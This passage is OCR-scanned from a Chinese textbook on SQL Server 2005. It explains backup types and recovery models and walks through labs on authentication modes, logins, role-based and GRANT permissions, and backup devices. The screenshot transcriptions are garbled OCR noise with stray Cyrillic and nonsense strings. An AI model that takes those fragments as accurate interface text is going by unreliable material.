长 ,消耗 的 存储 资源 多 ,会 对 系统 性 能 产生 较 大 的 影响 。 完 整备 份 也 是 其 他 备份 方式 的 基 
础 , 即 执行 任何 其 他 数据 库 备 份 类 型 前 ,必须 首先 至 少 执行 一 次 完整 数据 库 备 份 。 

差异 数据 库 备 份 : 在 执行 差异 备份 之 前 必须 已 经 执行 了 完整 数据 库 备 份 。 差 异 备份 
只 备份 自 上 一 次 完整 数据 库 备 份 以 来 发 生 改变 的 内 容 。 由 于 备份 的 数据 量 相 比 完整 备份 
要 小 很 多 ,因此 备份 的 效率 相对 较 高 。 差 异 数据 库 的 恢复 必须 在 完整 数据 库 备份 的 基础 
上 进行 恢复 。 差 异 数据 库 备 份 的 原理 如 图 6. 3 所 示 。 
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图 6.3 差异 数据 库 备 份 原理 图 


事务 日 志 备份 : 事务 日 志 备 份 是 指 备份 事务 日 志文 件 中 的 内 容 , 事 务 日 志文 件 记录 
了 对 数据 库 的 更 改 操作 ,事务 日 志 备 份 也 必须 在 执行 了 完整 数据 库 备 份 之 后 进行 。 在 执 
行 完 完整 备份 和 事务 日 志 备 份 后 ,事务 日 志 的 内 容 会 被 截断 。 事 务 日 志 备 份 所 需要 的 空 
间 、 时 间 和 消耗 的 资源 也 比 完整 备份 要 少 。 事 务 日 志 备 份 的 原理 如 图 6.4 所 示 。 


完整 备份 1 事务 日 志 备份 1 。 事务 日 志 备份 2 事务 日 志 备 份 3 完整 备份 2 
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图 6.4 事务 日 志 备份 原理 图 


数据 库 文件 或 文件 组 备份 : 这 种 备份 方式 备份 的 对 象 是 文件 或 文件 组 。 在 一 些 大 型 
数据 库 应 用 中 ,由 于 数据 库 非 常 大 ,数据 变 化 的 量 也 比较 大 ,执行 前 三 种 备份 都 需要 占用 
较 多 资源 ,而 采用 文件 或 文件 组 备份 方式 ,可 以 选择 部 分 文件 或 文件 组 进行 备份 ,备份 的 
量 会 相对 减少 很 多 ,备份 时 必须 指定 逻辑 文件 或 文件 组 ,一 般 将 表 和 索引 一 起 备份 。 

由 于 备份 操作 会 对 系统 性 能 造成 负面 影响 ,过 于 频繁 的 备份 在 实际 生产 环境 中 并 不 
是 好 办 法 。 管 理 员 可 以 根据 上 述 备份 方式 的 特点 ,灵活 组 合 , 并 结合 数据 库 业 务 系统 实际 
运行 的 特点 ,来 制定 合理 的 备份 策略 。 例 如 ,可 以 采用 完整 备份 结合 差异 备份 (或 事务 日 
志 备 份 ) ,在 每 周末 做 一 次 完整 备份 ,而 在 其 他 时 间 每 天 做 一 次 差异 备份 (或 事务 日 志 备 
份 )。 对 于 备份 要 求 高 的 ,也 可 以 每 天 凌晨 做 一 次 差异 备份 ,而 在 当天 的 其 他 时 间 ,每 隔 一 
定时 间 ( 如 一 小 时 或 两 小 时 等 ) 做 一 次 事务 日 志 备份 。 

2. 恢复 模式 

在 SQL Server 中 ,数据 库 能 够 执行 的 备份 方式 与 数据 库 * 恢 复 模式 ?选项 的 设置 有 
关 。 数 据 库 “ 恢 复 模式 ”选项 的 设置 有 3 种 : 简单 (simple) ,完整 (full) 、 大 容量 日 志 (bulk_ 
logged) ,这 三 种 恢复 模式 的 特点 如 下 。 

1) 简单 

在 “简单 ”恢复 模式 下 ,只 能 对 数据 库 执行 完整 备份 和 差异 备份 。 其 原因 是 ,SQL 
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Server 会 通过 在 数据 库 上 发 布 校 验 点 ,将 已 提交 的 事务 从 事务 日 志 中 复制 到 数据 库 中 ,并 
清除 之 前 的 日 志 内 容 。 设 置 “简单 ”模式 ,就 相当 于 在 数据 库 中 设置 这 个 选项 ,因此 ,无 法 
执行 事务 日 志 备 份 。 

2) 完整 

在 “完整 ”模式 下 ,可 以 对 数据 库 执行 完整 备份 .差异 备份 和 事务 日 志 备份 。 在 此 模式 
下 ,对 数据 库 所 做 的 各 种 操作 都 会 被 记录 在 事务 日 志 中 ,包括 大 容量 的 数据 录入 (如 
SELECT INTO,BULK INSERT 等 ) 都 会 记录 在 事务 日 志 中 。 但 是 ,这 种 模式 产生 的 事 
务 日 志 也 最 多 ,事务 日 志文 件 也 最 大 。 

3) 大 容量 日 志 

在 “大 容量 日 志 ” 模 式 下 ,与 “完整 ”模式 类 似 , 可 以 执行 完整 备份 差异 备份 和 事务 日 
志 备 份 。 但 是 对 于 SELECT INTO、BULK INSERT, WRITETEXT 和 UPDATETEXT 
等 大 量 数据 复制 的 操作 ,这 种 模式 在 事务 日 志 中 会 以 节省 空间 的 方式 来 记录 ,而 不 像 “ 完 
整 ” 模 式 记录 得 那么 完整 。 因 此 ,对 于 这 些 操作 的 还 原 会 受 影 响 ,无 法 还 原 到 特定 的 时 

3. 备份 数据 库 

备份 数据 库 的 操作 会 涉及 备份 方式 的 选择 、 备 份 介质 的 设 定 等 。 下 面 介 绍 SQL 
Server 2005 中 管理 备份 设备 .实现 各 种 备份 方式 操作 的 过 程 。 

1) 备份 设备 

备份 设备 是 指 存放 数据 库 备 份 的 介质 。 在 SQL Server 2005 中 备份 设备 可 以 是 硬 
盘 , 也 可 以 是 磁带 机 。 当 使 用 硬盘 作为 备份 设备 时 ,备份 设备 实际 就 是 备份 存放 在 物理 磁 
盘 上 的 文件 路 径 。 

备份 设备 可 以 分 为 两 种 : 临时 备份 设备 和 永久 备份 设备 。 临 时 备份 设备 是 指 在 备份 
过 程 中 产生 的 备份 文件 ,一 般 不 作 长 久 使 用 。 永 久 备份 文件 是 为 了 重复 使 用 ,特意 在 
SQL Server 中 创建 的 备份 文件 。 通 过 SQL Server 可 以 在 永久 备份 设备 中 添加 新 的 备份 
和 对 已 有 的 备份 进行 管理 。 

2) 执行 备份 

将 数据 备份 到 备份 设备 。 

4. 还 原 数 据 库 

对 于 数据 库 的 还 原 操作 ,必须 结合 数据 库 的 备份 策略 。 如 在 备份 时 采用 了 完整 备份 、 
差异 备份 和 事务 日 志 备份 三 种 方式 组 合 的 备份 方式 ,在 还 原 时 也 需要 将 三 种 备份 源 相 结 
合 进行 还 原 。 但 是 ,所 有 还 原 方式 都 必须 先 执行 完整 备份 还 原 后 ,才能 继续 后 续 的 还 原 
操作 。 


6.2 SQL Server 身份 认证 和 访问 控制 实验 


6.2.1 实验 目的 
掌握 SQL Server 身份 验证 模式 设置 的 方法 ; 掌握 SQL Server 三 级 授权 的 方法 。 
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6.2.2 实验 内 容 及 环境 


1. 实验 内 容 

SQL Server 身份 验证 模式 设置 ; SQL Server 三 级 授权 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 和 SQL Server 2005 软件 。 


6.2.3 实验 步骤 


1. 设置 SQL Server 身份 验证 方式 

(1) 安装 SQL Server 2005 软件 后 , 单 击 “ 开 始 ” 一 “所 有 程序 ”> Microsoft SQL 
Server 2005—SQL Server Management Studio Express, 出 现 如 图 6. 5 所 示 的 “连接 到 服 
务 器 ”对 话 框 ,输入 正确 的 用 户 名 /口令 后 单 击 “ 连 接 ” 选 项 ,进入 SQL Server Management 
Studio Express 主 界面 ,如 图 6.6 所 示 。 


& 连接 到 服务 器 


SQLServer2oo5 


080588258 T): 数据 库 引擎 
服务 器 名 称 ©): CP\SQLEXPRESS 
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图 6.5 连接 SQL Server 服务 器 
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图 6.6 SQL Server 管理 器 主 界面 
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(2) 在 如 图 6.6 所 示 的 Microsoft SQL Server Management Studio Express 主 界面 
左 侧 的 “对 象 资源 管理 器 ? 主 界面 中 , 右 击 服务 器 图 标 ,在 弹出 的 快捷 菜单 中 选择 属性 ” 选 
项 ,出 现 如 图 6.7 所 示 的 窗口 。 


CP\SQLEXPRESS 


Spes - [ив 


服务 器 身份 验证 


O тшт 身份 验证 模式 W 
© эй. Server 和 Finds 身份 验证 模式 O 


服务 器 
CP\SQLEXPEESS 


连接 
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图 6.7 SQL Server 服务 器 属性 


G) 在 如 图 6.7 所 示 的 服务 器 属性 设置 窗口 中 , 单 击 左 侧 的 “安全 性 ?选项 ,在 “服务 
器 身份 验证 ?选项 中 设置 身份 认证 模式 。 为 了 便于 后 续 案 例 的 学 习 , 请 将 身份 验证 模式 设 
置 为 “SQL Server 和 Windows 身份 验证 模式 ”, 设 置 完 成 后 单 击 “确定 ”按钮 。 

在 服务 器 端 设 置 完 SQL Server 使 用 的 身份 认证 模式 后 ,客户 端 连接 SQL Server 服 
务 器 时 ,就 必须 采用 符合 服务 器 端 验 证 模式 的 连接 选项 ,否则 就 无 法 通过 连接 。 

2. 新 建 SQL Server 登录 名 

(1) 在 如 图 6.8 所 示 的 Microsoft SQL Server Management Studio Express 主 界面 
左 侧 的 “对 象 资源 管理 器 主 界面 中 ,依次 展开 服务 器 、 安 全 性 节点 。 右 击 “ 登 录 名 ”选项 ， 
在 弹出 的 快捷 菜单 中 选择 “新 建 登录 名 ”选项 ,出 现 如 图 6. 9 所 示 窗 口 。 

(2) 在 如 图 6.9 所 示 的 “登录 名 -新 建 " 窗 口中 .输入 登录 名 ManagerLi, 选 择 身份 认证 
模式 为 “SQL Server 身份 验证 ”, 为 新 创建 用 户 设置 密码 (如 果 选 中 “强制 实施 密码 策略 ” 
“强制 密码 过 期 *" 和 “用 户 在 下 次 登录 时 必须 更 改 密码 " 复 选 框 , 则 用 户 密码 必须 满足 一 定 
的 复杂 度 , 用 户 第 一 次 登录 服务 器 时 必须 修改 密码 ) ,密码 设置 完成 后 单 击 “ 确 定 ” 按 钮 , 完 
成 SQL Server 登录 名 的 创建 。 
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图 6.8 选择 “新 建 登录 名 ”命令 
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图 6.9 新 建 登录 名 窗口 


(3) 按 同 样 的 方法 创建 身份 验证 模式 为 “SQL Server 身份 验证 ”的 用 户 TeacherChen , 
StudentMa, 
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3. 新 建 Windows 登录 名 

CD 在 Windows 操作 系统 中 ,选择 “开始 ”控制 面板 ?选项 ,在 打开 的 窗口 中 双击 
“管理 工具 ”选项 ; 在 “管理 工具 ”中 双击 “计算 机 管理 ”选项 ,在 如 图 6. 10 所 示 的 “计算 机 
管理 ”窗口 中 ,展开 左边 的 “本 地 用 户 和 组 ”, 右 击 “ 用 户 ” 选 项 ,在 弹出 的 快捷 菜单 中 选择 
“新 用 户 ” 选 项 , 按 提 示 新 建 一 个 Windows 用 户 chenping。 


(yes) 
[m хр ют SEV шп MED 


® g ke 
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图 6.10 新 建 系统 用 户 


(2) 在 Microsoft SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资源 
管理 器 "窗口 中 ,展开 服务 器 、 安 全 性 节点 , 右 击 “登录 名 ”, 在 弹出 的 快捷 菜单 中 选择 “新 建 
登录 名 ”选项 ,出 现 如 图 6. 11 所 示 的 “登录 名 -新 建 " 窗 口 ,选择 身份 认证 模式 为 "Windows 
身份 验证 ”。 

(3) 单 击 “ 登 录 名 ” 右 侧 的 “搜索 ”按钮 ,出 现 如 图 6. 12 所 示 的 “选择 用 户 或 组 ”对 话 
框 , 单 击 “ 对 象 类 型 "按钮 ,出 现 如 图 6. 13 所 示 的 “对 象 类 型 ”对话 框 , 色 选 “用 户 ”, 单 击 “ 确 
定 ” 按 钮 。 

СА) 回 到 “选择 用 户 或 组 ”对 话 框 中 , 单 击 “ 高 级 "按钮, 出现 如 图 6. 14 所 示 界 面 , 单 击 
“立即 查找 ”按钮 ,本 机 操作 系统 中 的 用户” 会 出 现在 列表 中 ,选中 需要 在 SQL Server 中 
登录 的 用 户 名 , 单 击 “ 确 认 ” 按 钮 。 

(5) 回 到 如 图 6.15 所 示 的 “登录 名 -新 建 " 窗 口 , 单 击 “ 确 定 ” 按 钮 ,新 创建 的 Windows 
登录 名 会 出 现在 “登录 名 ”文本 框 中 。 

4. 设置 服务 器 级 访问 控制 权限 

(1) 以 新 创建 的 用 户 身份 ManagerLi 登录 SQL Server 服务 器 ,在 Microsoft SQL 
Server Management Studio Express 主 界面 左 侧 的 “对 象 资源 管理 器 ”窗口 中 ,展开 服务 
器 数据库 节点 , 右 击 “数据 库 ” 按 钮 ,出 现 如 图 6. 16 所 示 的 快捷 菜单 。 

(2) 在 图 6. 16 弹出 的 快捷 菜单 中 选择 “新 建 数据 库 ” 命 令 ,输入 新 建 数据 库 名 称 后 单 
击 “ 确 定 ” 按 钮 ,会 出 现 如 图 6. 17 所 示 的 错误 提示 框 ,说 明 该 用 户 没有 创建 数据 库 的 权限 ， 
也 即 没有 服务 器 级 权限 。 
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图 6.11 新 建 Windows 登录 用 户 
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图 6. 12 “选择 用 户 或 组 ”对 话 框 
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图 6.13 “对 象 类 型 "对 话 框 
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图 6.14 搜索 系统 用 户 
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图 6.15 创建 Windows 登录 用 户 
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图 6.16 运行 新 建 数据 库 命令 


了 icrosoft SQL Server Management Studio Express 


创建 对 于 数据 库 "TeacherLi' 失 败 。 (Microsoft. SqlServer Express, Smo) 
其 他 信息 : 
Lo AKT Transact-SQL 语句 或 批 处 理 时 发 生 了 异常 。 (Microsoft.SqlServer.Express.ConnectionInfo) 


L> 在 数据 库 master 中 拒绝 了 CREATE DATABASE 权限 。 (Microsoft SQL Server » 错误: 262) 


oaa 


图 6.17 新 建 数据 库 失败 


(3) 为 登录 用 户 ManagerLi 授予 服务 器 级 的 权限 使 他 能 创建 数据 库 。 服 务 器 级 权限 
授予 可 以 通过 将 用 户 关 联 固定 服务 器 角色 实现 。 要 使 用 户 ManagerLi 具有 创建 数据 库 
的 权限 ,可 以 将 该 登录 名 归属 到 “dbcreator” 服 务 器 角色 ,“dbcreator” 服 务 器 角色 具有 创建 
数据 库 的 权限 。 以 管理 员 sa 的 身份 登录 服务 器 ,在 Microsoft SQL Server Management 
Studio Express 主 界面 左 侧 的 “对 象 资源 管理 器 "窗口 中 ,展开 服务 器 ,登录 名 节点 。 

OD 在 “登录 名 ”节点 中 ,双击 “ManagerLi” 登 录 名 ,出 现 如 图 6. 18 所 示 的 “登录 属性 ” 
窗口 ,选择 左 侧 的 “服务 器 角色 ”, 在 右 侧 的 “服务 器 角色 ?列表 中 勾 选 dbcreator 复 选 框 ,如 
图 6.18 所 示 。 

经 过 上 述 设 置 后 ,再 次 使 用 ManagerLi 连接 到 服务 器 ,能 够 成 功 创建 “学 生 选 课 ” 数 
据 库 , 同 时 在 “学 生 选 课 ” 数 据 库 下 创建 学 生 ( 学 号 ,姓名 ,性 别 , 年 龄 )、 课 程 ( 课 程 号 ,课程 
名 ,学 分 ) .选课 (学 号 ,课程 号 ,成绩 )3 张 表 ,并 在 这 3 张 表 中 分 别 填充 部 分 数据 。 

5. 创建 数据 库 用 户 

登录 用 户 要 能 访问 某 个 数据 库 ,必须 在 该 数据 库 中 有 对 应 的 数据 库 用 户 。 值 得 注意 
的 是 ,系统 会 为 每 个 数据 库 自 动 创建 dbo 数据 库 用 户 ,dbo 用 户 对 数据 库 拥 有 所 有 权限 ， 
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图 6.18 为 用 户 设置 服务 器 角色 


并 可 以 将 这 些 权 限 授 予 其 他 用 户 。 系 统 自 动 将 数据 库 创 建 者 的 登录 名 映射 到 dbo 数据 库 
用 户 , 因 而 创建 数据 库 的 用 户 拥有 对 数据 库 的 所 有 访问 权限 。 其 他 用 户 必须 手动 进行 登 
录 名 和 数据 库 名 的 映射 。 

(OD 以 创建 的 SQL Server 用 户 TeacherChen 登录 系统 , 单 击 “学 生 选 课 ” 数 据 库 ,出 
现 如 图 6. 19 所 示 的 无 法 访问 “学 生 选 课 " 数 据 库 错误 信息 提示 框 ,主要 原因 是 该 登录 用 户 
目前 还 不 是 “学 生 选 课 " 数 据 库 的 用 户 。 


Microsoft SQL Server Management Studio Express 


o 无 法 访问 数据 库 学 生 选 课 。 (Microsoft. SqlServer.Express.ObjectExplorer) 


aa 


图 6. 19 无 法 访问 “学 生 选课 "数据 库 提示 框 


(2) 以 数据 库 管理 员 sa 的 身份 登录 系统 ,在 Microsoft SQL Server Management 
Studio Express 主 界面 左 侧 的 “对 象 资源 管理 器 ”窗口 中 ,展开 服务 器 、 数 据 库 “ 学 生 选 课 
数据 库 ” 安 全 性 、 用 户 节点 ,可 以 查看 “学 生 选 课 ” 数 据 库 中 的 用 户 , 如 图 6. 20 所 示 。 

G) 右 击 “用 户 ” 节 点 ,出 现 如 图 6. 21 所 示 的 快捷 菜单 ,在 弹出 的 快捷 菜单 中 选择 “新 
建 用 户 ” 选 项 ,出 现 如 图 6. 22 所 示 的 窗口 。 
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图 6.20 查看 “学 生 选 课 " 数 据 库 中 的 用 户 
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图 6.21 选择 “新建 用 户 ? 选 项 
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图 6.22 新 建 数据 库 用 户 窗口 
(4) 在 如 图 6. 22 所 示 的 “数据 库 用 户 -新 建 " 窗 口中 ,输入 用 户 名 “TeacherChen”, 在 
“登录 名 ?选项 中 , 单 击 其 后 的 按钮 ,出 现 如 图 6. 23 所 示 的 “选择 登录 名 ”对 话 框 。 
P 选择 登录 名 


选择 这 些 对 象 类 型 G) 
登录 名 


输入 要 选择 的 对 象 名 称 TAD (ЕЮ: 


图 6.23 “选择 登录 名 ”对 话 框 


(5) 在 如 图 6. 23 所 示 的 “选择 登录 名 ”对 话 框 中 单 击 “ 浏 览 ” 按 钮 ,在 出 现 的 如 图 6. 24 
所 示 的 “查找 对 象 " 对 话 框 中 选择 用 户 TeacherChen, 连 续 两 次 单 击 “ 确 定 ” 按 钮 后 , 回 到 如 
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图 6. 22 所 示 的 窗口 ,数据 库 角 色 成 员 选 择 db_datareader, 其 他 参数 可 以 根据 需要 选择 ， 
设置 完成 后 , 单 击 “ 确 定 ” 按 钮 ,通过 这 样 的 设置 ,用 户 TeacherChen 就 可 以 打开 和 访问 
“学 生 选 课 ” 数 据 库 了 。 


找到 14 个 匹配 所 过关 型 的 对 象 . 


匹配 的 对 象 W: 
名 称 


А GU 
[A [stuenta] 


ЙД Treacherchen] 
Г] A (TescherLi] 
A [test] 
OA ramin] 


图 6.24 查看 当前 数据 库 用 户 


(6) 按 同样 的 方法 创建 数据 库 用 户 StudentMa, 但 不 要 为 其 设置 数据 库 角 色 db_ 
datareader, 请 通过 实验 体验 权限 的 差别 。 

6. 设置 数据 库 级 访问 权限 

新 创建 的 数据 库 用 户 TeacherChen 虽然 可 以 访问 数据 库 “ 学 生 选 课 ”, 但 是 能 够 执行 
的 操作 有 限 , 目 前 只 能 查看 数据 库 中 的 数据 , 想 要 具有 其 他 操作 权限 ,必须 通过 对 数据 库 
用 户 进行 权限 设置 来 实现 。 对 数据 库 用户 设 置 权限 最 简单 的 方式 是 与 数据 库 角 色相 关 
Ik. 假设 TeacherChen 想 在 “学 生 选 课 ” 数 据 库 中 创建 一 个 “学 生 选 修 数据 结构 情况 ”的 
视图 ,一 开始 TeacherChen 无 法 创建 视图 ,如 图 6.25 所 示 。 下 面 通过 关联 数据 库 角 色 进 
行 授 权 。 


| SQL Server Management Studio Express [Ea 


o 在 数据 库 “ 学 生 选 课 ” 中 拒绝 了 CREATE VIEN 权限。 
cE 


图 6.25 新 建 数据 库 用 户 没有 创建 视图 权限 


CD 以 数据 库 管理 员 sa 或 数据 库 所 有 者 ManagerLi 的 身份 登录 系统 ,在 Microsoft 
SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资源 管理 器 ”窗口 中 ,展开 
服务 器 .数据库 “学 生 选 课 ” 数 据 库 .安全 性 .角色 数据库 角 色 节 点 ,如 图 6. 26 所 示 。 

(2) 在 “数据 库 角色 ”节点 下 ,选择 要 添加 用 户 的 角色 ,这 里 因为 要 为 用 户 授 予 创 建 视 
图 的 权限 ,因而 选择 的 角色 为 ddladmin, 双 击 角色 名 ddladmin, 出 现 “ 数 据 库 角 色 属 性 ” 窗 
口 ,如 图 6. 27 所 示 , 单 击 “ 添 加 ”按钮 。 
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图 6.26 选择 数据 库 角色 


D 数据 库 角 色 属 性 - db_ddladain 
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9) 查看 连接 属性 


图 6.27 选择 角色 成 员 
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(3) 在 如 图 6. 28 所 示 的 “选择 数据 库 用 户 或 角色 ”对 话 框 中 ,输入 需要 添加 的 用 户 名 
或 者 单 击 “ 浏 览 " 按 钮 ,从 “用 户 和 数据 库 角色 ”列表 中 选择 需要 的 用 户 名 或 角色 ,这 里 选择 
数据 库 用 户 TeacherChen。 单 击 “ 确 定 ” 按 钮 后 ,返回 到 如 图 6. 27 所 示 的 “数据 库 角 色 属 
性 ”窗口 中 。 


xc 选择 数据 库 用 户 或 角色 


选择 这 些 对 象 类 型 6): 
RP. BERAG ЭЧӘ о) 
输入 要 选择 的 对 象 名 称 TD D: 


确定 x )|[ 天助 


图 6.28 “选择 数据 库 用 户 或 角色 ”对 话 框 


(4) 经 过 上 述 设 置 后 ,用 户 会 添加 到 角色 的 成 员 列 表 中 。 单 击 “ 确 定 ” 按 钮 ,完成 对 数 
据 库 角色 添加 用 户 的 操作 。 一 个 数据 库 角色 可 以 添加 多 个 数据 库 用 户 。 

(5) 再 次 以 TeacherChen 的 身份 登录 系统 ,可 以 发 现 该 用 户 已 经 可 以 创建 视图 了 。 

7. 设置 数据 级 访问 权限 

TeacherChen 目前 已 经 有 了 创建 视图 的 权限 ,作为 老师 ,他 还 应 该 有 往 数 据 库 中 插入 
课程 成 绩 的 权限 ,也 就 是 他 应 该 具有 对 成 绩 表 的 写 操作 权限 。 

(1) 以 TeacherChen 的 身份 登录 系统 ,打开 “学 生 选 课 ” 数 据 库 中 的 “成 绩 " 表 , 试 着 往 
里 面 添加 一 条 记录 ,保存 时 会 出 现 如 图 6. 29 所 示 的 错误 信息 提示 框 ,原因 是 用 户 
TeacherChen 没有 对 数据 表 的 写 操 作 权限 ,需要 对 用 户 授予 数据 表 的 写 权 限 。 


Hicrosoft SQL Server Management Studio Express 


未 更 新 任何 行 。 


4 中 的 数据 。 
Net SalClient Data Provider. 


zi 
[M JEHSTADHE RA GEE “学 生 沈 课 ' ,架构 dbo’ ) 的 INSERT 权限 。 


请 更 正 错误 并 重 试 ， 或 按 Esc 取消 更 改 。 


图 6.29 选择 数据 库 用 户 
(2) 以 数据 库 管理 员 sa 或 数据 库 所 有 者 ManagerLi 的 身份 登录 系统 ,在 Microsoft 
SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资 源 管理 器 ”窗口 中 ,展开 
服务 器 ,数据库 “学 生 选 课 ? 数 据 库 、 安 全 性 .用 户 节点 ,如 图 6. 30 所 示 。 
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图 6.30 选择 数据 库 用 户 


(3) 在 “用 户 ” 节 点 中 ,双击 TeacherChen 选项 ,在 出 现 的 如 图 6. 31 所 示 的 “数据 库 用 
户 -TeacherChen” 窗 口中 , 单 击 左 侧 栏 的 “安全 对 象 " 选 项 。 
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图 6.31 数据 库 用 户 属性 设置 
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(4) 出 现 如 图 6. 32 所 示 的 “安全 对 象 " 窗 口 单 击 右 侧 的 “添加 ”按钮 。 


TeacherChen 


服务 器 : 
CP\SQLEXFRESS 
连接 


图 6.32 数据 库 用 户 安全 对 象 设置 
(5) 在 如 图 6.33 所 示 的 “添加 对 象 ” 对 话 框 中 选中 “特定 对 象 ” 单 选 按钮 。 
Ф шна [3] 
要 添加 什么 对 象 ? 
ONES. 
O 特定 类 型 的 所 有 对 象 加 ). 


О 属于 该 架构 的 所 有 对 象 SG). 
架构 名 称 加 : db accessadmin 


图 6.33 “添加 对 象 "对 话 框 


(6) 单 击 “确定 ”按钮 后 ,在 图 6. 34 所 示 的 “选择 对 象 "对 话 框 中 单 击 “ 对 象 类 型 按 
钮 。 在 出 现 的 如 图 6. 35 所 示 的 "选择 对 象 类 型 "对话 框 中 勾 选 对 象 类 型 为 表 ”。 

(7) 单 击 “确定 ”按钮 后 回 到 如 图 6. 34 所 示 的 “选择 对 象 "对 话 框 , 单 击 * 浏 览 ?按钮 ， 
出 现 如 图 6. 36 所 示 的 对 话 框 ,选中 “成 绩 ” 表 ,确定 后 返回 。 
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输入 要 违 择 的 对 象 名 称 [3] 


图 6.34 “选择 对 象 "对 话 杠 
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图 6.35 “选择 对 象 类 型 "对 话 框 
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图 6.36 查找 数据 库 中 的 表 对 象 
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(8) 在 如 图 6.37 所 示 的 窗口 中 ,选中 Insert, Delete, Update, Select 权限 为 “授予 ”， 
该 用 户 就 拥有 对 成 绩 表 的 增 、 删 \ 改 、 查 询 的 权限 了 。 
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图 6.37 选择 数据 库 用 户 或 角色 界面 


(9) 对 用 户 的 授权 也 可 以 通过 SQL 语言 进行 。 

(D Jy StudentMa 设置 对 学 生 表 查 询 的 权限 并 验证 。 以 数据 库 管理 员 sa 或 数据 库 所 
有 者 ManagerLi 的 身份 登录 系统 , 单 击 “ 新 建 查询 ”选项 ,在 空白 查询 窗口 中 输入 
Transact-SQL 代码 ,如 图 6. 38 所 示 。 

© 为 StudentMa 设置 对 学 生 表 中 年 龄 字段 修改 的 权限 并 验证 ,如 图 6. 39 所 示 。 


~ CP\SQLEIPRE. . . LQuery1. sql*| 摘要 | | 
use 学 生 选 课 


grant select on dbo. 学 生 to Studentla 


,CPWSQLEXPEE. . .LQuery1. sql*| 摘要 
use 学 生 选 课 


grant update (Ей) оп dbo. 学 生 ko Studentma 


图 6.38 为 StudentMa 设 置 对 学 生 图 6.39 为 StudentMa 设置 对 学 生 表 中 
表 查 询 的 权限 年 龄 字段 修改 的 权限 
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6.3 数据 库 备 份 与 恢复 实验 


6.3.1 实验 目的 
理解 数据 库 备份 和 恢复 原理 ,掌握 SQL Server 数据 库 备份 和 恢复 技术 。 
6.3.2 实验 内 容 及 环境 


1. 实验 内 容 

设置 数据 库 恢 复 模 式 ; 创建 备份 设备 ; 完成 完整 备份 .差异 备份 和 事务 日 志 备份 ; A 
用 备份 进行 恢复 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 和 SQL Server 2005 软件 。 
6.3.3 实验 步骤 


І. 设置 数据 库 恢 复 模式 一 一 完整 

打开 SQL Server Management Studio Express. LJ sa 的 身份 登录 系统 ,在 Microsoft 
SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资 源 管 理 器 ”窗口 中 , 单 击 
需要 备份 的 数据 库 , 本 例 选择 “学 生 选 课 ” 数 据 库 , 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ” 
选项 ,出 现 如 图 6. 40 所 示 的 窗口 ,在 该 窗口 的 左上 侧 “ 选 择 页 ”部 分 , 单 击 “ 选 项 ”, 在 右 侧 


Ж ЖЕЕ 


[Su Server 2005 (0) 


ев 
SEH wal Вя mal 
асва 


服务 器 
CE\SQLEXPRESS 
иш 


Hibextett Le B 
А 
a жинин ox 
юй ЗЕ 


[mnia 
MT юш Edi 


图 6.40 设置 恢复 模式 
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页 面 中 的 “恢复 模式 ”中 选择 “完整 ”恢复 模式 ,设置 完成 后 单 击 “ 确 定 ” 按 钮 ,完成 数据 库 恢 
复 模式 的 设置 。 

2. 创建 备份 设备 

(1) 在 Microsoft SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资源 
管理 器 ?窗口 中 ,展开 服务 器 、 服 务 器 对 象 节点 。 在 “服务 器 对 象 " 节 点 中 右 击 “备份 设备 ” 
选项 ,在 弹出 的 快捷 菜单 中 选择 “新 建 备份 设备 ”选项 ,如 图 6. 41 所 示 。 


F.Nicrosoft SQL Server Management Studio Express 
ХН #80 视图 WD ТАФ Ып НЕС 帮助 中 
pu cr a i B b 
对 象 资源 管理 器 
=, 
E [f CPNSQLEXPRESS (SQL Server 9.0.4035 - sa) 
аш 数据 库 


= Са 安全 性 ч 
日 Га 服务 器 对 象 CP\SQLEXFRESS\ 服 务 器 对 象 \ 备 份 设备 
а 


a ба 服务 | 备份 数据 库 G) 名 称 
Reports 上 


BE) 


图 6.41 选择 “新 建 备份 设备 ” 


(2) 出 现 如 图 6.42 所 示 的 “备份 设备 "窗口 ,在 “设备 名 称 ” 中 输入 新 建 备份 设 备 的 逻 
辑 名 称 (此 处 为 “学生 选课 ”) ,选中 ”文件 ” 单 选 按钮 ,设置 备份 设备 存储 的 位 置 ,默认 会 存 
ЖЕ SQL Server 安装 目录 的 Backup 文件 夹 下 , 单 击 “ 浏 览 ” 按 钮 可 以 根据 需要 修改 文件 
路 径 。 

3. 完成 完整 备份 .差异 备份 和 事务 日 志 备份 

CD 为 了 演示 备份 和 恢复 过 程 ,在 “学 生 选 课 ” 数 据 库 学 生 表 中 添加 记录 如 图 6. 43 
所 示 。 

(2) 在 Microsoft SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资源 
管理 器 ”窗口 中 ,展开 服务 器 .数据库 节 点 。 在 数据 库 节点 中 右 击 要 备份 的 数据 库 ( 本 例 为 
“学 生 选 课 ”) ,在 弹出 的 快捷 菜单 中 选择 “任务 ”>“ 备 份 ” 选 项 ,出 现 如 图 6. 44 所 示 的 “ 备 
份 数据 库 ” 窗 口 , 在 “备份 数据 库 ”" 窗 口中 ,选择 备份 类 型 为 “完整 ",“ 备 份 组 件 ” 为 “ 数 
据 库 ”。 

(3) 在 图 6. 44 中 的 “目标 ” 栏 中 单 击 “ 添 加 ”按钮 ,出 现 如 图 6. 45 所 示 的 对 话 框 ,选择 
备份 设备 为 刚刚 创建 的 “学 生 选 课 ”, 单 击 “ 确 定 ”按钮 。 

Jim. 如 果 在 “选择 备份 目标 ”对 话 框 中 ,选中 “文件 名 " 单 选 按钮 , 则 创建 的 备份 文件 
为 临时 备份 设备 。 
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图 6.42 新 建 备份 设备 
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图 6.43 学 生 表 记 录 


(4) 单 击 * 备 份 数据 库 ? 窗 口 左 侧 的 “选项 *, 在 “选项 ”选项 卡 中 ,可 以 设置 备份 的 选 
项 ,如 图 6.46 所 示 。 
备份 选项 有 5 个 组 成 部 分 : 覆盖 媒体 、 可 靠 性 .事务 日 志 、 磁 带 机 。 各 选项 的 含义 介 
绍 如 下 。 
* 备份 到 现 有 媒体 集 : 包含 两 个 单 选 按钮 和 一 个 复 选 框 : 追加 到 现 有 备份 集 、 覆 盖 
